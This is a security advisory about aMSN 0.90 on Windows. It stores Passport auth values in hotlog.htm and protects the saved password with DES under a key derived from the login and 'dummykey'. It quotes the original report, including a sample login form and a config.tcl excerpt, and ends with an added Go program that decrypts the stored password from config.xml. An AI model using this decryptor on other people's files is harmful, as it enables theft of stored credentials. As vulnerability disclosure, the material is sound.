SecurityTracker.com
SecurityTracker Archives

Category:   Application (Instant Messaging/IRC/Chat)  >   aMSN
Vendor:   amsn.sourceforge.net
aMSN Discloses Password Hashes to Local Users
SecurityTracker Alert ID:  1010555
SecurityTracker URL:  http://securitytracker.com/id/1010555
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 21 2004
Impact:   Disclosure of authentication information

Version(s): 0.90
Description:   Lostmon reported a vulnerability in aMSN. A local user can obtain another user's stored Hotmail/Passport credentials.

It is reported that when the user opens new mail from the tray icon, the software writes an auto-submitting Passport login form to 'hotlog.htm' in the user's aMSN profile directory; the form carries the account's 'auth' token and 'creds' (MD5 authentication) value in hidden fields. The same directory holds 'config.xml', in which the 'remotepassword' entry (and 'encpassword', when password saving is enabled) is written by config.tcl as DES ciphertext under a key taken from the first 8 characters of the login value ('loginback') concatenated with the constant string "dummykey". Because the key is derived from non-secret data, a local user who can read config.xml may be able to decrypt the password, the report said.

Impact:   A local user can obtain a user's Passport authentication values and may be able to decrypt the user's stored password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/tracker/index.php?func=detail&aid=976450&group_id=54091&atid=472655
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Tested on Windows 2000 SP4

Message History:   None.


 Source Message Contents

Subject:  some important information about amsn windows client disclose: user



Hello:
I found this bug in the aMSN client:
http://sourceforge.net/tracker/index.php?func=detail&aid=976450&group_id=54091&atid=472655



Windows


=============================================================================
1. Introduction
2. What it was tested on
3. How to reproduce the exploit
4. Conclusion
5. Fix
=============================================================================
1. After studying the instant messenger client aMSN (v0.90) for
Windows and looking through its files, I noticed that a local malicious user
could obtain the hash of a user who has logged in to aMSN:
=============================================================================

2. This was tested on:
   aMSN v0.90 client
   Windows 2000 Pro SP4 build 2195
=============================================================================
3. Open the messenger client aMSN and log in to Hotmail with our user and password.
After we open our e-mail and click the tray envelope that notifies us that we
have new mail, Explorer opens and we see that a page is opened locally
from the local path, file:///C:/Documents%20and%20Settings/Lostmon/amsn/hotlog.htm
As we can see, this is the local path of the user profile that started the
session on the PC :/
If we open this folder and look at this path, specifically this file, we find the
following:
=============================================================================
code of file hotlog.htm

<html>
<head>
<noscript>
<meta http-equiv=Refresh content="0; url=http://www.hotmail.com">
</noscript>
</head>
<body onload="document.pform.submit(); ">
<form name="pform" action="https://loginnet.passport.com/ppsecure/md5auth.srf?lc=1033" method="POST">
<input type="hidden" name="mode" value="ttl">
<input type="hidden" name="login" value="yourfull">
<input type="hidden" name="username" value="yourfull@hotmail.com">
<input type="hidden" name="sid" value="507">
<input type="hidden" name="rru" value="/cgi-bin/HoTMaiL">
<input type="hidden" name="auth" value="58eRJLDWhDzdS64AsWCR1FKtjcWTkW76jtnGCOdp7bvlsr1wUHbfGLystSU6ig6bpdx7zGmj15d2MmglLZxr!iAQ$$">
<input type="hidden" name="creds" value="a93e78753eed0fe90ae59a9245d459d0">
<input type="hidden" name="svc" value="mail">
<input type="hidden" name="js" value="yes">
</form>
</body>
</html>
=============================================================================

Looking at this information we notice the way this form sends its data when it
is executed.

But things do not end here: if we look in the folder %userroot%amsn\
very carefully, we find a config.xml whose last lines contain this entry:
=============================================================================
part of code of config.xml

   <entry>
      <attribute>remotepassword</attribute>
      <value>c26ccaaba25f6642</value>
   </entry>
ummmmmm

We suppose that remotepassword is the password that identifies each account :/
So if we make a thorough investigation of where this remote password
comes from, we arrive at the folder c:\program files\amsn\scripts\
and, looking among these files, we find config.tcl.
At line 296 we have this:
    }

    # The DES key is the first 8 characters of "<loginback>dummykey": it is
    # derived from the login value, not from anything secret.
    if { ($config(save_password)) && ($password != "")} {
        set key [string range "${loginback}dummykey" 0 7]
        # "h*" writes the ciphertext as hex with the low nibble of each byte first
        binary scan [::des::encrypt $key "${password}\n"] h* encpass
        puts $file_id "   <entry>\n      <attribute>encpassword</attribute>\n      <value>$encpass</value>\n   </entry>"
    }

    # Same key and same scheme for the remote password
    set key [string range "${loginback}dummykey" 0 7]
    binary scan [::des::encrypt $key "${config(remotepassword)}\n"] h* encpass
    puts $file_id "   <entry>\n      <attribute>remotepassword</attribute>\n      <value>$encpass</value>\n   </entry>\n"

    foreach custom $config(customsmileys2) {
        puts $file_id "   <emoticon>"
        foreach attribute [array names emotions] {
            if { [string match "${custom}_*" $attribute ] } {
                set var_attribute [::sxml::xmlreplace [string map [list "${custom}_" ""] $attribute ]]
                set var_value [::sxml::xmlreplace $emotions($attribute)]
                puts $file_id "      <$var_attribute>$var_value</$var_attribute>"
            }

=============================================================================
These are the functions that encode the remote password, umm :/
If we look at the background of this file we will be able to say that the
variables necessary to reverse certain functions are there.

Yours faithfully

#dismarking
greetings to RotteW and LuTRiZiA, so many nights with me :DDDD

Lostmon (lostmon@spymac.com)



Curiosity is what makes the mind move ...




---- Msg sent via Spymac Mail - http://www.spymac.com
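The config.tcl excerpt quoted in the report shows that the only thing protecting the 'remotepassword' value in config.xml is a DES key built from the login ('loginback') plus the constant "dummykey", and that the ciphertext is written with Tcl's "h*" format, which puts the low nibble of each byte first. The Go program below is an added example, not code from aMSN or from Lostmon's report: it reproduces that write path and the reverse operation any local reader of config.xml can perform. Assumptions, since the excerpt does not show them: loginback is taken to be the plain login name as stored in config.xml (if aMSN transforms it first, apply the same transform before deriving the key); the Tcl des package is taken to run in ECB mode with zero padding, and for a single-block value such as the 16-hex-digit one shown above, CBC with an all-zero IV yields the identical block, so the mode does not change the result there. The login and password in main() are constructed sample data.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
)

// deriveKey mirrors `set key [string range "${loginback}dummykey" 0 7]` in
// aMSN's config.tcl: the first 8 bytes of the login followed by "dummykey".
// For a login of 8 or more characters the key is simply the login's first 8
// characters; shorter logins get "dummykey" appended. ASSUMPTION: loginback is
// the plain login name, treated here as ASCII bytes.
func deriveKey(loginback string) []byte {
	return []byte((loginback + "dummykey")[:8])
}

// tclHexDecode undoes `binary scan ... h*`. Tcl's lowercase "h" emits the LOW
// nibble of each byte first, so the on-disk text "c2" is the byte 0x2c.
func tclHexDecode(s string) ([]byte, error) {
	if len(s)%2 != 0 {
		return nil, errors.New("odd-length hex string")
	}
	swapped := []byte(s)
	for i := 0; i+1 < len(swapped); i += 2 {
		swapped[i], swapped[i+1] = swapped[i+1], swapped[i]
	}
	return hex.DecodeString(string(swapped))
}

// tclHexEncode is the inverse: the text config.tcl writes into <value>.
func tclHexEncode(b []byte) string {
	h := []byte(hex.EncodeToString(b))
	for i := 0; i+1 < len(h); i += 2 {
		h[i], h[i+1] = h[i+1], h[i]
	}
	return string(h)
}

// desECB runs single DES over whole blocks. ASSUMPTION: the bundled Tcl des
// package used ECB; with CBC and an all-zero IV the first block is the same.
func desECB(key, in []byte, decrypt bool) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(in)%bs != 0 {
		return nil, errors.New("input length is not a multiple of the DES block size")
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += bs {
		if decrypt {
			block.Decrypt(out[i:i+bs], in[i:i+bs])
		} else {
			block.Encrypt(out[i:i+bs], in[i:i+bs])
		}
	}
	return out, nil
}

// encryptLikeAMSN reproduces the write path: plaintext is password + "\n",
// zero-padded to a block boundary (ASSUMPTION), DES under the derived key,
// then Tcl's nibble-swapped hex.
func encryptLikeAMSN(loginback, password string) (string, error) {
	pt := []byte(password + "\n")
	if rem := len(pt) % des.BlockSize; rem != 0 {
		pt = append(pt, make([]byte, des.BlockSize-rem)...)
	}
	ct, err := desECB(deriveKey(loginback), pt, false)
	if err != nil {
		return "", err
	}
	return tclHexEncode(ct), nil
}

// decryptRemotePassword is what any local reader of config.xml can do:
// rebuild the key from the login, undo the nibble order, decrypt, and strip
// the padding and trailing newline.
func decryptRemotePassword(loginback, stored string) (string, error) {
	ct, err := tclHexDecode(stored)
	if err != nil {
		return "", err
	}
	pt, err := desECB(deriveKey(loginback), ct, true)
	if err != nil {
		return "", err
	}
	pt = bytes.TrimRight(pt, "\x00")
	pt = bytes.TrimSuffix(pt, []byte("\n"))
	return string(pt), nil
}

func main() {
	// Constructed sample: login "lostmon" saving the password "s3cret".
	login, password := "lostmon", "s3cret"
	enc, err := encryptLikeAMSN(login, password)
	if err != nil {
		panic(err)
	}
	fmt.Printf("DES key: %q\n<value>%s</value>\n", deriveKey(login), enc)
	got, err := decryptRemotePassword(login, enc)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered from config.xml: %q\n", got)
}
```

The point the program makes concrete is that the "key" adds no secrecy: for any login of eight or more characters it is just the login itself, which sits in the same config.xml next to the ciphertext. Reading the file is therefore equivalent to reading the password, which is why the only effective mitigation is keeping the profile directory unreadable by other local users or not saving the password at all.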




Copyright 2019, SecurityGlobal.net LLC